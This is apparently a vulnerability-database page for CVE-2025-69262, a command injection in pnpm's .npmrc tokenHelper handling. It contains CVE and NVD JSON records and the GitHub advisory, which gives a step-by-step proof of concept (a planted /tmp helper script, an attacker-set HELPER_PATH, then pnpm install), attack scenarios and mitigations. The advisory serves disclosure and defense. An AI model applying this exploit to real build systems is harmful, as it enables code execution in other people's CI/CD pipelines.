Vulnerability-Lookup

CVE-2025-69262 (GCVE-0-2025-69262)

Vulnerability from cvelistv5 – Published: 2026-01-07 22:30 – Updated: 2026-01-09 04:55

Title

pnpm vulnerable to Command Injection via environment variable substitution

Summary

pnpm is a package manager. Versions 6.25.0 through 10.26.2 have a Command Injection vulnerability when using environment variable substitution in .npmrc configuration files with tokenHelper settings. An attacker who can control environment variables during pnpm operations could achieve Remote Code Execution (RCE) in build environments. This issue is fixed in version 10.27.0.

Severity ?

7.6 (High)


                        
                          CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CWE-94 - Improper Control of Generation of Code ('Code Injection')

Assigner

GitHub_M

References

URL

Tags

	https://github.com/pnpm/pnpm/security/advisories/…	x_refsource_CONFIRM
	https://github.com/pnpm/pnpm/releases/tag/v10.27.0	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	pnpm	pnpm	Affected: >=6.25.0, < 10.27.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-69262",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-01-08T00:00:00+00:00",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-01-09T04:55:29.891Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/pnpm/pnpm/security/advisories/GHSA-2phv-j68v-wwqx"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "pnpm",
          "vendor": "pnpm",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e=6.25.0, \u003c 10.27.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "pnpm is a package manager. Versions 6.25.0 through 10.26.2 have a Command Injection vulnerability when using environment variable substitution in .npmrc configuration files with tokenHelper settings. An attacker who can control environment variables during pnpm operations could achieve Remote Code Execution (RCE) in build environments. This issue is fixed in version 10.27.0."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.6,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "HIGH",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-78",
              "description": "CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-94",
              "description": "CWE-94: Improper Control of Generation of Code (\u0027Code Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-07T22:30:07.428Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/pnpm/pnpm/security/advisories/GHSA-2phv-j68v-wwqx",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/pnpm/pnpm/security/advisories/GHSA-2phv-j68v-wwqx"
        },
        {
          "name": "https://github.com/pnpm/pnpm/releases/tag/v10.27.0",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/pnpm/pnpm/releases/tag/v10.27.0"
        }
      ],
      "source": {
        "advisory": "GHSA-2phv-j68v-wwqx",
        "discovery": "UNKNOWN"
      },
      "title": "pnpm vulnerable to Command Injection via environment variable substitution"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-69262",
    "datePublished": "2026-01-07T22:30:07.428Z",
    "dateReserved": "2025-12-30T19:12:56.184Z",
    "dateUpdated": "2026-01-09T04:55:29.891Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2025-69262\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-01-07T23:15:50.330\",\"lastModified\":\"2026-01-08T19:15:58.480\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"pnpm is a package manager. Versions 6.25.0 through 10.26.2 have a Command Injection vulnerability when using environment variable substitution in .npmrc configuration files with tokenHelper settings. An attacker who can control environment variables during pnpm operations could achieve Remote Code Execution (RCE) in build environments. This issue is fixed in version 10.27.0.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"HIGH\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":0.8,\"impactScore\":6.0}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-78\"},{\"lang\":\"en\",\"value\":\"CWE-94\"}]}],\"references\":[{\"url\":\"https://github.com/pnpm/pnpm/releases/tag/v10.27.0\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/pnpm/pnpm/security/advisories/GHSA-2phv-j68v-wwqx\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/pnpm/pnpm/security/advisories/GHSA-2phv-j68v-wwqx\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-69262\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-01-08T15:09:34.287955Z\"}}}], \"references\": [{\"url\": \"https://github.com/pnpm/pnpm/security/advisories/GHSA-2phv-j68v-wwqx\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-01-08T15:09:37.723Z\"}}], \"cna\": {\"title\": \"pnpm vulnerable to Command Injection via environment variable substitution\", \"source\": {\"advisory\": \"GHSA-2phv-j68v-wwqx\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 7.6, \"attackVector\": \"LOCAL\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"HIGH\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"HIGH\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"pnpm\", \"product\": \"pnpm\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e=6.25.0, \u003c 10.27.0\"}]}], \"references\": [{\"url\": \"https://github.com/pnpm/pnpm/security/advisories/GHSA-2phv-j68v-wwqx\", \"name\": \"https://github.com/pnpm/pnpm/security/advisories/GHSA-2phv-j68v-wwqx\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/pnpm/pnpm/releases/tag/v10.27.0\", \"name\": \"https://github.com/pnpm/pnpm/releases/tag/v10.27.0\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"pnpm is a package manager. Versions 6.25.0 through 10.26.2 have a Command Injection vulnerability when using environment variable substitution in .npmrc configuration files with tokenHelper settings. An attacker who can control environment variables during pnpm operations could achieve Remote Code Execution (RCE) in build environments. This issue is fixed in version 10.27.0.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-78\", \"description\": \"CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-94\", \"description\": \"CWE-94: Improper Control of Generation of Code (\u0027Code Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-01-07T22:30:07.428Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2025-69262\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-01-09T04:55:29.891Z\", \"dateReserved\": \"2025-12-30T19:12:56.184Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-01-07T22:30:07.428Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-2PHV-J68V-WWQX

Vulnerability from github – Published: 2026-01-07 18:51 – Updated: 2026-01-08 20:07

Summary

pnpm vulnerable to Command Injection via environment variable substitution

Details

Summary

A command injection vulnerability exists in pnpm when using environment variable substitution in .npmrc configuration files with tokenHelper settings. An attacker who can control environment variables during pnpm operations could achieve remote code execution (RCE) in build environments.

Affected Components

Package: pnpm
Versions: All versions using @pnpm/config.env-replace and loadToken functionality
File: pnpm/network/auth-header/src/getAuthHeadersFromConfig.ts - loadToken() function
File: pnpm/config/config/src/readLocalConfig.ts - .npmrc environment variable substitution

Technical Details

Vulnerability Chain

Environment Variable Substitution
.npmrc supports ${VAR} syntax
Substitution occurs in readLocalConfig()
loadToken Execution
Uses spawnSync(helperPath, { shell: true })
Only validates absolute path existence
Attack Flow

.npmrc: registry.npmjs.org/:tokenHelper=${HELPER_PATH}
   ↓
envReplace() → /tmp/evil-helper.sh
   ↓
loadToken() → spawnSync(..., { shell: true })
   ↓
RCE achieved

Code Evidence

pnpm/config/config/src/readLocalConfig.ts:17-18

key = envReplace(key, process.env)
ini[key] = parseField(types, envReplace(val, process.env), key)

pnpm/network/auth-header/src/getAuthHeadersFromConfig.ts:60-71

export function loadToken(helperPath: string, settingName: string): string {
  if (!path.isAbsolute(helperPath) || !fs.existsSync(helperPath)) {
    throw new PnpmError('BAD_TOKEN_HELPER_PATH', ...)
  }
  const spawnResult = spawnSync(helperPath, { shell: true })
  // ...
}

Proof of Concept

Prerequisites

Private npm registry access
Control over environment variables
Ability to place scripts in filesystem

PoC Steps

# 1. Create malicious helper script
cat > /tmp/evil-helper.sh << 'SCRIPT'
#!/bin/bash
echo "RCE SUCCESS!" > /tmp/rce-log.txt
echo "TOKEN_12345"
SCRIPT
chmod +x /tmp/evil-helper.sh

# 2. Create .npmrc with environment variable
cat > .npmrc << 'EOF'
registry=https://registry.npmjs.org/
registry.npmjs.org/:tokenHelper=${HELPER_PATH}
EOF

# 3. Set environment variable (attacker controlled)
export HELPER_PATH=/tmp/evil-helper.sh

# 4. Trigger pnpm install
pnpm install  # RCE occurs during auth

# 5. Verify attack
cat /tmp/rce-log.txt

PoC Results

==> Attack successful
==> File created: /tmp/rce-log.txt
==> Arbitrary code execution confirmed

Impact

Severity

CVSS Score: 7.6 (High)
CVSS Vector: cvss:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

Affected Environments

High Risk: - CI/CD pipelines (GitHub Actions, GitLab CI) - Docker build environments - Kubernetes deployments - Private registry users

Low Risk: - Public registry only - Production runtime (no pnpm execution) - Static sites

Attack Scenarios

Scenario 1: CI/CD Supply Chain

Repository → Build Trigger → pnpm install → RCE → Production Deploy

Scenario 2: Docker Build

FROM node:20
ARG HELPER_PATH=/tmp/evil
COPY .npmrc .
RUN pnpm install  # RCE

Scenario 3: Kubernetes

Secret Control → Env Variable → .npmrc Substitution → RCE

Mitigation

Temporary Workarounds

Disable tokenHelper:

# .npmrc
# registry.npmjs.org/:tokenHelper=${HELPER_PATH}

Use direct tokens:

//registry.npmjs.org/:_authToken=YOUR_TOKEN

Audit environment variables: - Review CI/CD env vars - Restrict .npmrc changes - Monitor build logs

Recommended Fixes

Remove shell: true from loadToken
Implement helper path allowlist
Validate substituted paths
Consider sandboxing

Disclosure

Discovery: 2025-11-02
PoC: 2025-11-02
Report: [Pending disclosure decision]

References

Repository: https://github.com/pnpm/pnpm
Affected: @pnpm/config.env-replace@^3.0.2
Similar: CVE-2024-53866, CVE-2023-37478

Credit

Reported by: Jiyong Yang Contact: sy2n0@naver.com

Severity ?

7.5 (High)


                  
                    CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "pnpm"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "6.25.0"
            },
            {
              "fixed": "10.27.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-69262"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-78",
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-07T18:51:07Z",
    "nvd_published_at": "2026-01-07T23:15:50Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nA command injection vulnerability exists in pnpm when using environment variable substitution in `.npmrc` configuration files with `tokenHelper` settings. An attacker who can control environment variables during pnpm operations could achieve remote code execution (RCE) in build environments.\n\n## Affected Components\n\n- **Package**: pnpm\n- **Versions**: All versions using `@pnpm/config.env-replace` and `loadToken` functionality\n- **File**: `pnpm/network/auth-header/src/getAuthHeadersFromConfig.ts` - `loadToken()` function\n- **File**: `pnpm/config/config/src/readLocalConfig.ts` - `.npmrc` environment variable substitution\n\n## Technical Details\n\n### Vulnerability Chain\n\n1. **Environment Variable Substitution**\n   - `.npmrc` supports `${VAR}` syntax\n   - Substitution occurs in `readLocalConfig()`\n\n2. **loadToken Execution**\n   - Uses `spawnSync(helperPath, { shell: true })`\n   - Only validates absolute path existence\n\n3. **Attack Flow**\n```\n.npmrc: registry.npmjs.org/:tokenHelper=${HELPER_PATH}\n   \u2193\nenvReplace() \u2192 /tmp/evil-helper.sh\n   \u2193\nloadToken() \u2192 spawnSync(..., { shell: true })\n   \u2193\nRCE achieved\n```\n\n### Code Evidence\n\n**`pnpm/config/config/src/readLocalConfig.ts:17-18`**\n```typescript\nkey = envReplace(key, process.env)\nini[key] = parseField(types, envReplace(val, process.env), key)\n```\n\n**`pnpm/network/auth-header/src/getAuthHeadersFromConfig.ts:60-71`**\n```typescript\nexport function loadToken(helperPath: string, settingName: string): string {\n  if (!path.isAbsolute(helperPath) || !fs.existsSync(helperPath)) {\n    throw new PnpmError(\u0027BAD_TOKEN_HELPER_PATH\u0027, ...)\n  }\n  const spawnResult = spawnSync(helperPath, { shell: true })\n  // ...\n}\n```\n\n## Proof of Concept\n\n### Prerequisites\n- Private npm registry access\n- Control over environment variables\n- Ability to place scripts in filesystem\n\n### PoC Steps\n\n```bash\n# 1. Create malicious helper script\ncat \u003e /tmp/evil-helper.sh \u003c\u003c \u0027SCRIPT\u0027\n#!/bin/bash\necho \"RCE SUCCESS!\" \u003e /tmp/rce-log.txt\necho \"TOKEN_12345\"\nSCRIPT\nchmod +x /tmp/evil-helper.sh\n\n# 2. Create .npmrc with environment variable\ncat \u003e .npmrc \u003c\u003c \u0027EOF\u0027\nregistry=https://registry.npmjs.org/\nregistry.npmjs.org/:tokenHelper=${HELPER_PATH}\nEOF\n\n# 3. Set environment variable (attacker controlled)\nexport HELPER_PATH=/tmp/evil-helper.sh\n\n# 4. Trigger pnpm install\npnpm install  # RCE occurs during auth\n\n# 5. Verify attack\ncat /tmp/rce-log.txt\n```\n\n### PoC Results\n```\n==\u003e Attack successful\n==\u003e File created: /tmp/rce-log.txt\n==\u003e Arbitrary code execution confirmed\n```\n\n## Impact\n\n### Severity\n- **CVSS Score**: 7.6 (High)\n- **CVSS Vector**: cvss:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H\n\n### Affected Environments\n\n**High Risk:**\n- CI/CD pipelines (GitHub Actions, GitLab CI)\n- Docker build environments\n- Kubernetes deployments\n- Private registry users\n\n**Low Risk:**\n- Public registry only\n- Production runtime (no pnpm execution)\n- Static sites\n\n### Attack Scenarios\n\n**Scenario 1: CI/CD Supply Chain**\n```\nRepository \u2192 Build Trigger \u2192 pnpm install \u2192 RCE \u2192 Production Deploy\n```\n\n**Scenario 2: Docker Build**\n```dockerfile\nFROM node:20\nARG HELPER_PATH=/tmp/evil\nCOPY .npmrc .\nRUN pnpm install  # RCE\n```\n\n**Scenario 3: Kubernetes**\n```\nSecret Control \u2192 Env Variable \u2192 .npmrc Substitution \u2192 RCE\n```\n\n## Mitigation\n\n### Temporary Workarounds\n\n**Disable tokenHelper:**\n```ini\n# .npmrc\n# registry.npmjs.org/:tokenHelper=${HELPER_PATH}\n```\n\n**Use direct tokens:**\n```ini\n//registry.npmjs.org/:_authToken=YOUR_TOKEN\n```\n\n**Audit environment variables:**\n- Review CI/CD env vars\n- Restrict .npmrc changes\n- Monitor build logs\n\n### Recommended Fixes\n\n1. Remove `shell: true` from loadToken\n2. Implement helper path allowlist\n3. Validate substituted paths\n4. Consider sandboxing\n\n## Disclosure\n\n- **Discovery**: 2025-11-02\n- **PoC**: 2025-11-02\n- **Report**: [Pending disclosure decision]\n\n## References\n\n- Repository: https://github.com/pnpm/pnpm\n- Affected: `@pnpm/config.env-replace@^3.0.2`\n- Similar: CVE-2024-53866, CVE-2023-37478\n\n## Credit\n\nReported by: Jiyong Yang\nContact: sy2n0@naver.com",
  "id": "GHSA-2phv-j68v-wwqx",
  "modified": "2026-01-08T20:07:34Z",
  "published": "2026-01-07T18:51:07Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/pnpm/pnpm/security/advisories/GHSA-2phv-j68v-wwqx"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69262"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/pnpm/pnpm"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pnpm/pnpm/releases/tag/v10.27.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "pnpm vulnerable to Command Injection via environment variable substitution"
}

FKIE_CVE-2025-69262

Vulnerability from fkie_nvd - Published: 2026-01-07 23:15 - Updated: 2026-01-08 19:15

Severity ?

7.5 (High) - CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/pnpm/pnpm/releases/tag/v10.27.0
	security-advisories@github.com	https://github.com/pnpm/pnpm/security/advisories/GHSA-2phv-j68v-wwqx
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/pnpm/pnpm/security/advisories/GHSA-2phv-j68v-wwqx

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "pnpm is a package manager. Versions 6.25.0 through 10.26.2 have a Command Injection vulnerability when using environment variable substitution in .npmrc configuration files with tokenHelper settings. An attacker who can control environment variables during pnpm operations could achieve Remote Code Execution (RCE) in build environments. This issue is fixed in version 10.27.0."
    }
  ],
  "id": "CVE-2025-69262",
  "lastModified": "2026-01-08T19:15:58.480",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "HIGH",
          "attackVector": "LOCAL",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "HIGH",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 0.8,
        "impactScore": 6.0,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-01-07T23:15:50.330",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/pnpm/pnpm/releases/tag/v10.27.0"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/pnpm/pnpm/security/advisories/GHSA-2phv-j68v-wwqx"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "url": "https://github.com/pnpm/pnpm/security/advisories/GHSA-2phv-j68v-wwqx"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Undergoing Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-78"
        },
        {
          "lang": "en",
          "value": "CWE-94"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2025-69262 (GCVE-0-2025-69262)

GHSA-2PHV-J68V-WWQX

Summary

Affected Components

Technical Details

Vulnerability Chain

Code Evidence

Proof of Concept

Prerequisites

PoC Steps

PoC Results

Impact

Severity

Affected Environments

Attack Scenarios

Mitigation

Temporary Workarounds

Recommended Fixes

Disclosure

References

Credit

FKIE_CVE-2025-69262

Tags

Sightings

Nomenclature